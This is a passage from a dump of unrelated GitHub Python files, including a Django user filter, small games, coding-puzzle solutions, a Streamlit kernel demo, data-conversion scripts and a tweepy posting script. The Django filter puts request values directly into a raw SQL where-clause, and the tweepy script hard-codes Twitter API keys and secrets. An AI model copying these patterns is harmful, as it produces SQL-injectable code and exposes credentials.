tuple(admission_choices)\n\n def get_extra_sql_statuses(self):\n status_join = []\n status_where = []\n status_type_counter = 0\n for filter_name in [u'user_status_activity', u'user_status_filial', u'user_status_admission']:\n if filter_name in self.data:\n status_type_counter += 1\n table_name = self.STATUS_SQL_PREFIX + str(status_type_counter)\n\n status_join.append(self.STATUS_SQL_JOIN.format(table_name))\n status_where.append(\n '({0}.userstatus_id = {1})'\n .format(\n table_name, ' OR {0}.userstatus_id = '.join(\n self.data.getlist(filter_name)\n ).format(table_name)\n )\n 
)\n\n if status_type_counter:\n return self.STATUS_SQL_EXTRA.format(' '.join(status_join), ' AND '.join(status_where))\n return ''\n\n @property\n def qs(self):\n if not hasattr(self, '_qs'):\n qs = super(UserProfileFilter, self).qs\n if not hasattr(self, '_users_info'):\n qs_filter = {}\n\n if u'courses' in self.data:\n qs_filter['user__group__course__id__in'] = self.data.getlist(u'courses')\n if u'groups' in self.data:\n qs_filter['user__group__id__in'] = self.data.getlist(u'groups')\n\n profiles_info = qs.filter(**qs_filter).values(\n 'id',\n 'user__id',\n 'user__username',\n 'user__email',\n 'user__last_name',\n 'user__first_name',\n 'user_status__id',\n 'user_status__name',\n 'user_status__color'\n )\n\n extra_sql = self.get_extra_sql_statuses()\n if extra_sql:\n profiles_info = profiles_info.extra(where=[extra_sql])\n\n users_info = {}\n for info in profiles_info:\n if info['user__id'] not in users_info:\n users_info[info['user__id']] = defaultdict(dict)\n users_info[info['user__id']]['id_profile'] = info['id']\n users_info[info['user__id']]['username'] = info['user__username']\n users_info[info['user__id']]['email'] = info['user__email']\n users_info[info['user__id']]['last_name'] = info['user__last_name']\n users_info[info['user__id']]['first_name'] = info['user__first_name']\n if info['user_status__id']:\n users_info[info['user__id']]['statuses'][info['user_status__id']] = {\n 'name': info['user_status__name'],\n 'color': info['user_status__color'],\n }\n self.users_info = users_info\n return self._qs\n\n class Meta:\n model = UserProfile\n fields = ['courses', 'groups', 'user_status_filial', 'user_status_activity', 'user_status_admission']\n","repo_name":"znick/anytask","sub_path":"anytask/users/model_user_profile_filter.py","file_name":"model_user_profile_filter.py","file_ext":"py","file_size_in_byte":7357,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"31"} +{"seq_id":"42959647679","text":"from turtle import Turtle, Screen\nfrom cars import Car, STARTING_MOVE_DISTANCE\nimport time\nimport random\nfrom player import Player\nfrom scoreboard import Scoreboard\n\nscreen = Screen()\nscreen.setup(600,600)\nscreen.bgcolor('white')\nscreen.tracer(0)\n\nplayer = Player()\ncar_manager = Car()\nscoreboard = Scoreboard(position=(0,270))\nx_boundaries = -300\n\n\nscreen.listen()\nscreen.onkey(player.advance, 'Up')\n\ngame_is_on = True\n\n\nwhile game_is_on:\n screen.update()\n time.sleep(0.1)\n\n car_manager.create_cars()\n car_manager.moving()\n\n if player.ycor() > 280:\n scoreboard.update_score()\n player.reseting_the_game()\n car_manager.level_up()\n\n for car in car_manager.all_cars:\n if car.distance(player) < 20:\n game_is_on = False\n scoreboard.game_over()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nscreen.exitonclick()","repo_name":"nicolasvilleneuve/TurtleFrogger","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21278651179","text":"############### prob link : https://leetcode.com/problems/best-time-to-buy-and-sell-stock/\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n if len(prices) < 1 :\n return 0\n min = prices[0]; r= 0\n for i in prices:\n if i < min:\n min = i\n r = max(r, i - min)\n return r\n \n","repo_name":"TAUIL-Abd-Elilah/LeetCode","sub_path":"easy/121. Best Time to Buy and Sell Stock.py","file_name":"121. 
Best Time to Buy and Sell Stock.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28219892130","text":"import streamlit as st\nimport pandas as pd\nimport seaborn as sns\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import Colormap\n#from matplotlib.colors import SymLogNorm\n\nhide = \"\"\"\n \n \"\"\"\n\nst.markdown(hide, unsafe_allow_html=True)\n\nif 'old_num_pts' not in st.session_state:\n st.session_state['old_num_pts'] = -1\n\ndef my_kernel(x, y, pt, kernel='poly', degree = 3, gamma = 1):\n if kernel == 'poly':\n return np.power(np.dot(np.array([xx,yy]),pt)+1,degree)\n elif kernel == 'rbf':\n dist = np.array([xx,yy])-pt\n return np.exp(-gamma*np.dot(dist,dist))\n elif kernel == 'sigmoid':\n return np.tanh(gamma *np.dot(np.array([xx,yy]),pt)+1)\n\ncol1, col2 = st.columns([2,3])\n\nwith col1:\n kernel = st.selectbox('Kernel to use:', \n ('Polynomial', 'Radial basis function', 'Sigmoid'))\n \n if kernel == 'Polynomial':\n kernel = 'poly'\n elif kernel == 'Radial basis function':\n kernel = 'rbf'\n elif kernel == 'Sigmoid':\n kernel = 'sigmoid'\n\n num_pts = st.slider('Number of instances:', min_value = 1, max_value = 7)\n degree = 1\n gamma = 1\n if kernel == 'poly':\n degree = st.slider('Degree:', min_value = 1, max_value = 5)\n else:\n gamma = st.slider('gamma:', min_value=0.1, max_value=2.0, step = 0.1)\n \n new_pts = st.button('New points')\n if (st.session_state['old_num_pts'] != num_pts or new_pts):\n st.session_state.pts = np.array(4*np.random.rand(num_pts,2)-2)\n st.session_state['old_num_pts'] = num_pts\n\n pts = st.session_state.pts\n\n tabularView = st.checkbox('Tabular view')\n if tabularView:\n numDivisions = st.slider('Number of values in each direction', min_value=7, max_value = 25, step = 6)\n \n\n\n\n\nwith col2:\n if not tabularView:\n XX = np.linspace(-3,3,50)\n YY = np.linspace(-3,3,50)\n ZZ = np.zeros([ len(YY), len(XX)])\n i=0\n for xx in XX:\n j=0\n for yy in YY:\n zz = 0\n for pt in pts:\n zz = zz + my_kernel(xx, yy, pt, kernel = kernel, gamma = gamma, degree=degree)\n ZZ[j,i]=zz\n j = j+1\n i=i+1\n fig, ax = plt.subplots()\n spread = np.max(ZZ)-np.min(ZZ)\n if spread > 10**3:\n if np.min(ZZ) < 0:\n log_levels = np.append(np.sort(-(10**np.arange(1,np.log10(-np.min(ZZ)), step = 1))), 0 )\n else:\n log_levels = []\n log_levels = np.append(log_levels, 10**np.arange(1, np.log10(np.max(ZZ))))\n CS = ax.contour(XX, YY, ZZ, levels=log_levels, colors='gray')\n else:\n CS = ax.contour(XX, YY, ZZ, colors='gray')\n ax.clabel(CS, inline=True, fontsize=10)\n if kernel == 'poly':\n ax.set_title('Polynomial with degree = '+ str(degree))\n elif kernel == 'rbf':\n ax.set_title('RBF with gamma = '+ str(gamma))\n elif kernel == 'sigmoid':\n ax.set_title('Sigmoid with gamma = '+ str(gamma))\n ax.set_aspect('equal', 'box')\n sns.scatterplot(x= pts[:,0],y =pts[:,1])\n plt.scatter(x= [0],y =[0], c = 'black', marker='+')\n\n st.pyplot(fig)\n \n else:\n \n XX = np.linspace(-3,3,numDivisions)\n YY = np.linspace(-3,3,numDivisions)\n ZZ = np.zeros([ len(YY), len(XX)])\n i=0\n for xx in XX:\n j=0\n for yy in YY:\n zz = 0\n for pt in pts:\n zz = zz + my_kernel(xx, yy, pt, kernel = kernel, gamma = gamma, degree=degree)\n ZZ[j,i]=zz\n j = j+1\n i=i+1\n ZZ = np.round(ZZ, 2)\n ZZ = pd.DataFrame(ZZ, \n index = ( 'y=%d' % i for i in np.round(YY,2)), \n columns= ( 'x=%d' % i for i in np.round(XX,2))\n )\n #ZZ.columns = np.round(XX,2)\n pdpts = 
pd.DataFrame(pts.transpose(), index = ['x','y'])\n st.caption(\"Instances\")\n st.write(pdpts)\n st.caption('''Kernel values for each (x,y) coordinate''')\n #st.write('''
    x
    ''', unsafe_allow_html=True)\n st.write(ZZ)\n #st.text(log_levels)","repo_name":"sdlauer/authored-streamlits","sub_path":"MachineLearning/Kernels.py","file_name":"Kernels.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41166856832","text":"import logging\nimport numpy as np\nfrom core.nlp.response_generator.product.base.base_response_generator import BaseResponseGenerator\n\n\nclass OYSMeaninglessInARowResponseGenerator(BaseResponseGenerator):\n def __call__(self):\n try:\n responses = self.__create_oys_after_meaningless_in_a_row()\n\n self.response_data['regular'] = responses\n\n return self.response_data\n except:\n logging.exception('')\n return self.response_data\n\n def __create_oys_after_meaningless_in_a_row(self):\n qr = [\n [\"okay!\"],\n [\"i see:)\"],\n [\"gotcha!\"],\n [\"right!\"],\n [\"alright!\"],\n ]\n oys = [\n [\"just let you know im always here\"],\n [\"you know i am always here for you ok?\"],\n [\"I love to be here for you\"],\n [\"it is always glad to talk to you\"],\n [\"it is always good feeling to listen to you\"]\n ]\n encourage = [\n [\"and you can tell me anything whenever you ready😋\"],\n [\"you know, you can come talk to me anytime you want, no rush😜\"],\n [\"take your time and please come back here whenever you ready🤗\"],\n [\"again, you just come talk to me whenever you want, never feel forced🤓\"],\n [\"i think you need little break now..just come back whenever you would like to😋\"]\n ]\n np.random.shuffle(qr)\n np.random.shuffle(oys)\n np.random.shuffle(encourage)\n return qr[0] + oys[0] + encourage[0]","repo_name":"rinigo/therapy_chatbot_jullie","sub_path":"core/nlp/response_generator/product/cct/OYS_Meaningless_In_A_Row_response_generator.py","file_name":"OYS_Meaningless_In_A_Row_response_generator.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12174004641","text":"\n# https://www.acmicpc.net/problem/1107 강의\n\n\nchannel = int(input())\nnum_broken = int(input())\nif num_broken > 0:\n brokens = list(map(int, input().split(' ')))\nelse:\n brokens = []\nbroken = [False] * 10\nfor x in brokens:\n broken[x] = True # marking broken number\n\n# bruteforce\ndef possible(c):\n if c == 0:\n if broken[0]:\n return 0\n return 1\n\n len_ = 0\n while c > 0:\n if broken[c % 10]:\n return 0\n len_ += 1\n c //= 10\n return len_\n\n\ndef solution():\n ans = abs(channel - 100)\n\n for i in range(1000000 + 1):\n c = i\n len_ = possible(c)\n if len_ > 0:\n press = abs(c - channel)\n if ans > len_ + press:\n ans = len_ + press\n\n return ans\n\nprint(solution())","repo_name":"nellaG/ps","sub_path":"baekjoon/1107.py","file_name":"1107.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12143456828","text":"# Use pytorch_py3.8.8\n# Write train.csv and train_word_probabilities.csv to text files that JAVA program can read\n\nimport logging\nimport pandas as pd\nfrom gensim.corpora import Dictionary\n\nlogging.basicConfig(\n # filename='out.log',\n level=logging.INFO,\n format='%(asctime)s %(levelname)s %(message)s')\nlogger = logging.getLogger(__name__) \n\n\n# All_Beauty All_Beauty_sentence\n# AMAZON_FASHION AMAZON_FASHION_sentence\n# CDs_and_Vinyl CDs_and_Vinyl_sentence\n# Cell_Phones_and_Accessories Cell_Phones_and_Accessories_sentence\n# Digital_Music 
Digital_Music_sentence\n# Electronics Electronics_sentence\n# Industrial_and_Scientific Industrial_and_Scientific_sentence\n# Luxury_Beauty Luxury_Beauty_sentence\n# Musical_Instruments Musical_Instruments_sentence\n# Software Software_sentence\n# Video_Games Video_Games_sentence\n\ndata_name = 'All_Beauty_sentence'\ndata_dir = '20k'\ntrain_path = f'/home/tuomas/Python/Gradu/data_processing/datasets/Amazon review data/Training_data/{data_name}/{data_dir}/'\n\n#%%\n# Write training dataframe to text file\ndef dataframe_generator(df):\n for _,row in df.iterrows():\n yield row['reviewText']\n \ndf = pd.read_csv(train_path+'train.csv')\ndf['reviewText']=df['reviewText'].apply(eval)\ndf['SPOS_idx']=df['SPOS_idx'].apply(eval)\n\ndf_proba = pd.read_csv(train_path+'train_word_probabilities.csv')\ndf_proba['word_prob']=df_proba['word_prob'].apply(eval)\n\n# Create dictionary.\ndictnr = Dictionary(dataframe_generator(df))\n\n# Write training files\nseparate_sentences = True\nwith open(train_path+'train_vidx.txt', 'w') as outfile_vidx, open(train_path+'train_text.txt', 'w') as outfile_text, open(train_path+'train_proba.txt', 'w') as outfile_proba:\n for _,row in df.iterrows():\n did = row['doc_id']\n word_proba = df_proba.loc[df_proba['doc_id']==did]['word_prob'].iloc[0]\n i=0\n for w in row['reviewText']:\n if w=='.':\n if separate_sentences:\n outfile_text.write('\\n')\n outfile_vidx.write('\\n')\n outfile_proba.write('\\n')\n continue\n outfile_text.write(w+' ')\n outfile_vidx.write(str(dictnr.token2id[w])+' ')\n outfile_proba.write(str(word_proba[i])+' ')\n i+=1\n outfile_text.write('\\n\\n')\n outfile_vidx.write('\\n\\n')\n outfile_proba.write('\\n\\n')\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","repo_name":"TP1997/Text-Preprocessing","sub_path":"to_JAVA_format.py","file_name":"to_JAVA_format.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39629040324","text":"import sys\nimport tweepy\n\nconsumer_token = '5VAX9gC5n7OuyCqKLKVA'\nconsumer_secret = 's8xrzrlvTKPnJ3v6R9k6UTnGTnAUqxJ3wC1ZWFSRg'\naccess_key = \"18420720-DMID708lIxZfyGu5aTLVnXVanbKnuJxBkPwGZTvuz\"\naccess_secret = \"NgDeDar4ZZsfjDwtoZ4YTMM2nSngq0TO2OWxJDHqK4\"\n\nauth = tweepy.OAuthHandler(consumer_token, consumer_secret)\nauth.set_access_token(access_key, access_secret)\napi = tweepy.API(auth)\napi.update_status(\"This is my Second tweet from command line! 
Woot!\")","repo_name":"stolksdorf/AdviceFromRob","sub_path":"auth setup/cmdtweet.PY","file_name":"cmdtweet.PY","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"27283626868","text":"from collections import deque\nfrom bisect import bisect_left\n\nn = int(input())\nal = list(map(int, input().split()))\ng = [ [] for _ in range(n)]\nfor _ in range(n-1):\n u,v = map(int, input().split())\n u-=1\n v-=1\n g[u].append(v)\n g[v].append(u)\n\nINF = 10**10\ndp = [INF]*(n+1)\ndp[0] = -INF\n\nhist = [(-1,-1)]*n\nvisited = [False]*n\nq = deque([(0,-1,-1)])\nansl = [-1]*n\nwhile q:\n curr_node, prev_ind, prev_v = q.popleft()\n if visited[curr_node]:\n dp[prev_ind] = prev_v\n # print('--skip===')\n # print(curr_node+1)\n # print(prev_ind,prev_v)\n # print(dp)\n continue \n ind = bisect_left(dp, al[curr_node])\n orig = dp[ind]\n dp[ind] = al[curr_node]\n ans = bisect_left(dp, INF) - 1\n ansl[curr_node] = ans\n # print('-----')\n # print(curr_node+1)\n # print(dp)\n hist[curr_node] = (ind,al[curr_node])\n visited[curr_node] = True\n novis = []\n for next_node in g[curr_node]:\n if not visited[next_node]: novis.append(next_node)\n else:q.appendleft((next_node,ind,orig))\n for v in novis: q.appendleft((v,ind,orig))\n\n\nfor a in ansl: print(a)","repo_name":"nami4mo/competitive-programming","sub_path":"2_kakomon/abc126-211/abc165_f.py","file_name":"abc165_f.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16295084556","text":"import node\nimport numpy as np\nimport math \nimport heuristics as h\n\ndef create_board():\n\tboard = [\t\n\t\t[0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0, 0],\n\t\t[0, 0, 0, 0, 0],\t\t\n\t]\n\n\tboard = np.array(board,dtype=object)\n\treturn board\n\n\ndef get_available_moves(board):\n\tmoves = []\n\tcolumn_counter = 0\n\n\tfor i in range(0, len(board)):\n\t\tfor j in range(0, len(board[column_counter])):\n\t\t\tif board[i][j] == 0:\n\t\t\t\tmoves.append([i, j])\n\t\tcolumn_counter += 1\n\n\treturn moves\n\n\ndef perform_move(board, move, player):\n\tboard[int(move[0])][int(move[1])] = player\n\n\treturn board\n\n\ndef calculate_score(board, player):\n\tif player == 1:\n\t\treturn calculate_score_player1(board)\n\telse:\n\t\treturn calculate_score_player2(board)\n\n\ndef calculate_score_player1(board):\n\tsequence = '11'\n\tsequence_enemy = '22'\n\n\tscore = []\n\tscore_enemy = []\n\tpieces_center = h.pieces_center(board, 1)\n\tpieces_center_enemy = h.pieces_center(board, 2)\n\n\tfor _ in range(0, 6):\n\t\tscore.append(verify_verticals(board, sequence) + pieces_center)\n\t\tscore.append(verify_main_diagonals(board, sequence) + pieces_center)\n\t\tscore.append(verify_secondary_diagonals(board, sequence) + pieces_center)\n\t\tscore_enemy.append(verify_verticals(board, sequence_enemy) + pieces_center_enemy)\n\t\tscore_enemy.append(verify_main_diagonals(board, sequence_enemy) + pieces_center_enemy)\n\t\tscore_enemy.append(verify_secondary_diagonals(board, sequence_enemy) + pieces_center_enemy)\n\t\tsequence += '1'\n\t\tsequence_enemy += '2'\n\n\tif max(score_enemy) == math.inf:\n\t\treturn -math.inf\n\telif max(score) == math.inf:\n\t\treturn 
math.inf\n\n\treturn max(score) - max(score_enemy)\n\n\ndef calculate_score_player2(board): \n\tsequence = '22'\n\tsequence_enemy = '11'\n\tscore = []\n\tscore_enemy = []\n\n\tpieces_center = h.pieces_center(board, 2)\n\tpieces_center_enemy = h.pieces_center(board, 1)\n\tfor _ in range(0, 6):\n\t\tscore.append(verify_verticals(board, sequence) + pieces_center)\n\t\tscore.append(verify_main_diagonals(board, sequence) + pieces_center)\n\t\tscore.append(verify_secondary_diagonals(board, sequence) + pieces_center)\n\t\tscore_enemy.append(verify_verticals(board, sequence_enemy) + pieces_center_enemy)\n\t\tscore_enemy.append(verify_main_diagonals(board, sequence_enemy) + pieces_center_enemy)\n\t\tscore_enemy.append(verify_secondary_diagonals(board, sequence_enemy) + pieces_center_enemy)\n\t\tsequence += '2'\n\t\tsequence_enemy += '1'\n\n\tif max(score_enemy) == math.inf:\n\t\t\treturn math.inf\n\telif max(score) == math.inf:\n\t\treturn -math.inf\n\n\treturn max(score_enemy) - max(score)\n\n\ndef verify_main_diagonals(board, sequence):\n\tscore = 0\n\t#print('main diagonals')\n\tmain_diagonals = [\n\t\t[board[0][0], board[1][0], board[2][0], board[3][0], board[4][0], board[5][0]],\n\t\t[board[0][1], board[1][1], board[2][1], board[3][1], board[4][1], board[5][1], board[6][0]],\n\t\t[board[0][2], board[1][2], board[2][2], board[3][2], board[4][2], board[5][2], board[6][1], board[7][0]],\n\t\t[board[0][3], board[1][3], board[2][3], board[3][3], board[4][3], board[5][3], board[6][2], board[7][1], board[8][0]],\n\t\t[board[0][4], board[1][4], board[2][4], board[3][4], board[4][4], board[5][4], board[6][3], board[7][2], board[8][1], board[9][0]],\n\t\t[board[1][5], board[2][5], board[3][5], board[4][5], board[5][5], board[6][4], board[7][3], board[8][2], board[9][1], board[10][0]],\n\t\t[board[2][6], board[3][6], board[4][6], board[5][6], board[6][5], board[7][4], board[8][3], board[9][2], board[10][1]],\n\t\t[board[3][7], board[4][7], board[5][7], board[6][6], board[7][5], board[8][4], board[9][3], board[10][2]],\n\t\t[board[4][8], board[5][8], board[6][7], board[7][6], board[8][5], board[9][4], board[10][3]],\n\t\t[board[5][9], board[6][8], board[7][7], board[8][6], board[9][5], board[1][4]]\n\t]\n\n\tlength = len(sequence)\n\tfor row in main_diagonals:\t\n\t\tif sequence in ''.join(str(i) for i in row):\n\t\t\tif length == 5:\n\t\t\t\t#print('5')\n\t\t\t\treturn math.inf\n\t\t\telif length == 4:\n\t\t\t\t#print('4')\n\t\t\t\tscore += 1350\n\t\t\telif length == 3:\n\t\t\t\t#print('3')\n\t\t\t\tscore += 450\n\t\t\telif length == 2:\n\t\t\t\t#print('2')\n\t\t\t\tscore += 150\n\t\n\treturn score\n\n\ndef verify_secondary_diagonals(board, sequence):\n\tscore = 0\n\tsecondary_diagonals = [\n\t\t[board[5][0], board[6][0], board[7][0], board[8][0], board[9][0], board[10][0]],\n\t\t[board[4][0], board[5][1], board[6][1], board[7][1], board[8][1], board[9][1], board[10][1]],\n\t\t[board[3][0], board[4][1], board[5][2], board[6][2], board[7][2], board[8][2], board[9][2], board[10][2]],\n\t\t[board[2][0], board[3][1], board[4][2], board[5][3], board[6][3], board[7][3], board[8][3], board[9][3], board[10][3]],\n\t\t[board[1][0], board[2][1], board[3][2], board[4][3], board[5][4], board[6][4], board[7][4], board[8][4], board[9][4], board[10][4]],\n\t\t[board[0][0], board[1][1], board[2][2], board[3][3], board[4][4], board[5][5], board[6][5], board[7][5], board[8][5], board[9][5]],\n\t\t[board[0][1], board[1][2], board[2][3], board[3][4], board[4][5], board[5][6], board[6][6], board[7][6], 
board[8][6]],\n\t\t[board[0][2], board[1][3], board[2][4], board[3][5], board[4][6], board[5][7], board[6][7], board[7][7]],\n\t\t[board[0][3], board[1][4], board[2][5], board[3][6], board[4][7], board[5][8], board[6][8]],\n\t\t[board[0][4], board[1][5], board[2][6], board[3][7], board[4][8], board[5][9]]\n\t]\n\n\tlength = len(sequence)\n\tfor row in secondary_diagonals:\n\t\tif sequence in ''.join(str(i) for i in row):\n\t\t\tif length == 5:\n\t\t\t\treturn math.inf\n\t\t\telif length == 4:\n\t\t\t\tscore += 1350\n\t\t\telif length == 3:\n\t\t\t\tscore += 450\n\t\t\telif length == 2:\n\t\t\t\tscore += 150\n\t\n\treturn score\n\n\ndef verify_verticals(board, sequence):\n\tscore = 0\n\tverticals = [\n\t\t[board[0][0], board[0][1], board[0][2], board[0][3], board[0][4]],\n\t\t[board[1][0], board[1][1], board[1][2], board[1][3], board[1][4], board[1][5]],\n\t\t[board[2][0], board[2][1], board[2][2], board[2][3], board[2][4], board[2][5], board[2][6]],\n\t\t[board[3][0], board[3][1], board[3][2], board[3][3], board[3][4], board[3][5], board[3][6], board[3][7]],\n\t\t[board[4][0], board[4][1], board[4][2], board[4][3], board[4][4], board[4][5], board[4][6], board[4][7], board[4][8]],\n\t\t[board[5][0], board[5][1], board[5][2], board[5][3], board[5][4], board[5][5], board[5][6], board[5][7], board[5][8], board[5][9]],\n\t\t[board[6][0], board[6][1], board[6][2], board[6][3], board[6][4], board[6][5], board[6][6], board[6][7], board[6][8]],\n\t\t[board[7][0], board[7][1], board[7][2], board[7][3], board[7][4], board[7][5], board[7][6], board[7][7]],\n\t\t[board[8][0], board[8][1], board[8][2], board[8][3], board[8][4], board[8][5], board[8][6]],\n\t\t[board[9][0], board[9][1], board[9][2], board[9][3], board[9][4], board[9][5]],\n\t\t[board[10][0], board[10][1], board[10][2], board[10][3], board[10][4]]\n\t]\n\t\n\tlength = len(sequence)\n\tfor row in verticals:\n\t\tif sequence in ''.join(str(i) for i in row):\n\t\t\tif length == 5:\n\t\t\t\treturn math.inf\n\t\t\telif length == 4:\n\t\t\t\tscore += 1350\n\t\t\telif length == 3:\n\t\t\t\tscore += 450\n\t\t\telif length == 2:\n\t\t\t\tscore += 150\n\t\n\treturn score\n\n\ndef removal_piece(board, server_moves, player):\n\tif player == '1':\n\t\tfor move in server_moves:\n\t\t\tif board[move[0]-1][move[1]-1] == 2:\n\t\t\t\treturn move\n\telse:\n\t\tfor move in server_moves:\n\t\t\tif board[move[0]-1][move[1]-1] == 1:\n\t\t\t\treturn move\n\t\n\treturn False\n\n\ndef forbidden_moves(board, server_moves):\n\tforbidden_moves = []\n\tmoves = get_available_moves(board)\n\n\tfor move in moves:\n\t\tif (move[0]+1, move[1]+1) not in server_moves:\n\t\t\tforbidden_moves.append([move[0]+1, move[1]+1])\n\t\n\treturn forbidden_moves\n\ndef show_tree(nodes):\n\twhile(len(nodes) > 0):\n\t\tnode = nodes.pop(0)\n\t\t\n\t\tprint(node.get_board())\n\t\tprint(node.get_score())\n\n\t\tnew_nodes = node.get_lowers()\n\t\tfor lower in new_nodes:\n\t\t\tnodes.append(lower)","repo_name":"douglasscorrea/boku-player","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18876346766","text":"from SPARQLWrapper import SPARQLWrapper2\nfrom django.core.management.base import NoArgsCommand\nfrom django.db import transaction, reset_queries\nfrom jocondelab.models import Country\nfrom core.models import Notice\nfrom core.utils import show_progress\nfrom django.utils.http import urlquote\nfrom optparse import make_option\n\n\nclass 
Command(NoArgsCommand):\n\n help = \"Import countries from dbpedia\"\n \n option_list = NoArgsCommand.option_list + (\n make_option('-b', '--batch-size',\n dest= 'batch_size',\n type='int',\n default= 50,\n help= 'number of object to import in bulk operations' \n ), \n )\n \n def handle_noargs(self, **options):\n \n def count_notices(uri):\n return Notice.objects.filter(noticeterm__term__dbpedia_uri=uri).count()\n \n def add_country(dbpedia_uri, iso_code_3, iso_code_2):\n nb_notices = count_notices(dbpedia_uri)\n countryobj, created = Country.objects.get_or_create(\n dbpedia_uri = dbpedia_uri,\n defaults = {\n 'iso_code_3': iso_code_3,\n 'iso_code_2': iso_code_2,\n 'nb_notices': nb_notices\n }\n )\n if not created:\n countryobj.iso_code_3 = iso_code_3\n countryobj.iso_code_2 = iso_code_2\n countryobj.nb_notices = nb_notices\n countryobj.save()\n \n writer = None\n resource_prefix = u'http://fr.dbpedia.org/resource/'\n batch_size = options.get('batch_size', 50)\n \n transaction.enter_transaction_management()\n transaction.managed()\n\n endpoint = SPARQLWrapper2(\"http://fr.dbpedia.org/sparql\")\n sparql = \"\"\"\n select distinct ?pays ?code where {\n ?pays rdf:type dbpedia-owl:Country .\n ?pays prop-fr:iso ?code\n } LIMIT 300\n \"\"\"\n endpoint.setQuery(sparql)\n results = endpoint.query()\n \n count = len(results.bindings)\n \n substitutions = [\n (u'R%C3%A9publique_populaire_de_Chine', u'Chine')\n ]\n \n for i,binding in enumerate(results.bindings):\n if binding[u\"code\"].type == 'literal':\n resource_suffix = urlquote(binding[u\"pays\"].value.replace(resource_prefix,\"\"))\n for s in substitutions:\n if resource_suffix == s[0]:\n resource_suffix = s[1]\n break\n dbpedia_uri = u'%s%s'%(resource_prefix, resource_suffix)\n writer = show_progress(i+1, count, dbpedia_uri, 50, writer)\n iso_codes = binding[u\"code\"].value.split(\", \")\n if (len(iso_codes) > 1):\n add_country(dbpedia_uri, iso_codes[0], iso_codes[1])\n\n if not ((i+1) % batch_size):\n transaction.commit()\n reset_queries()\n\n # insert code for Maurice and Antarctica\n extra_countries = [\n (u'%sMaurice_(pays)'%resource_prefix, \"MUS\", \"MU\"),\n (u'%sAntarctique'%resource_prefix, \"ATA\", \"AQ\")\n ]\n for c in extra_countries:\n add_country(*c)\n \n transaction.commit()\n reset_queries()\n transaction.leave_transaction_management()\n ","repo_name":"IRI-Research/jocondelab","sub_path":"src/jocondelab/management/commands/import_countries.py","file_name":"import_countries.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"43911294359","text":"from crm.forms import CamModelRequestForm, CamModelRequestImageFormset\nfrom authentication.forms import ProfileCreationForm\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import authenticate, login\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.views import View\nimport uuid\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass Index(View):\n def get(self, request):\n # form = ProfileCreationForm()\n return redirect('authentication:login')\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass Main(View):\n def get(self, request):\n # form = ProfileCreationForm()\n return render(request, 'index.html')\n\n # def post(self, request):\n # form = ProfileCreationForm(request.POST or None)\n # if form.is_valid():\n # form.save()\n # email = 
request.POST['email']\n # password = request.POST['password1']\n # user = authenticate(email=email, password=password)\n # if user is not None:\n # login(request, user)\n # return redirect('management:index')\n # else:\n # return redirect('authentication:login')\n # else:\n # return render(request, 'registration/signup.html', {'form': form})\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass ModelRequest(View):\n def get(self, request):\n form = CamModelRequestForm()\n formset = CamModelRequestImageFormset()\n return render(request, 'model_request/model_request_form.html', {'form': form, 'formset': formset})\n\n def post(self, request):\n form = CamModelRequestForm(request.POST or None, request.FILES or None)\n formset = CamModelRequestImageFormset(request.POST or None, request.FILES or None)\n if form.is_valid():\n cammodel_request = form.save()\n for image in formset:\n if image.is_valid():\n if 'DELETE' in image.cleaned_data and image.cleaned_data['DELETE']:\n if image.cleaned_data['id']:\n image.cleaned_data['id'].delete()\n continue\n if image.empty_permitted and not image.has_changed():\n continue\n image_instance = image.save(commit=False)\n image_instance.request = cammodel_request\n image_instance.save()\n # cammodel_request.request_uuid = uuid.uuid5(uuid.NAMESPACE_DNS, cammodel_request.name)\n # cammodel_request.save()\n messages.success(request, 'Заявка принята. С вами свяжутся по указанному вами номеру или почте. Спасибо.')\n return redirect('common:index')\n else:\n messages.error(request, f'Произошла ошибка. {form.errors}')\n return render(request, 